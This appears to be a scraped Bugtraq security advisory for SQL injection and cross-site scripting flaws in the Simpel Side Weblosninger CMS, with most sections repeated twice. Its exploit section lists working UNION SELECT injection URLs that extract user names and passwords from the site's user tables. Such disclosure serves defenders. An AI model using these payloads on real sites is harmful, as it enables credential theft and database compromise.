Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
BID:29332
Info
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 29332 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2505 |
| Remote: | Yes |
| Local: | No |
| Published: | May 21 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | Mr.SQL |
| Vulnerable: |
Simpel Side Weblosninger 4 Simpel Side Weblosninger 3 Simpel Side Weblosninger 2 Simpel Side Weblosninger 1 |
| Not Vulnerable: | |
Discussion
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
Weblosninger is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Weblosninger 4 and prior versions are vulnerable.
Weblosninger is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Weblosninger 4 and prior versions are vulnerable.
Exploit / POC
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*
http://www.example.com/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*
http://www.example.com/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*
http://www.example.com/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*
http://www.example.com/result.php?search=[XSS]
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index2.php?id=-4+union+select+1,2,concat_ws(0x3a3a,brugernavn,adgangskode),4,5,6+from+web1_brugere/*
http://www.example.com/index2.php?id=2&mainid=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3+from+web2_brugere/*
http://www.example.com/index2.php?id=-3+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web3_brugere/*
http://www.example.com/index2.php?id=-1+union+select+1,concat_ws(0x3a3a,brugernavn,adgangskode),3,4,5,6+from+web4_brugere/*
http://www.example.com/result.php?search=[XSS]
Solution / Fix
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Simpel Side Weblosninger SQL Injection and Cross-Site Scripting Vulnerabilities
References:
References:
- Weblosninger Homepage (Simpel Side)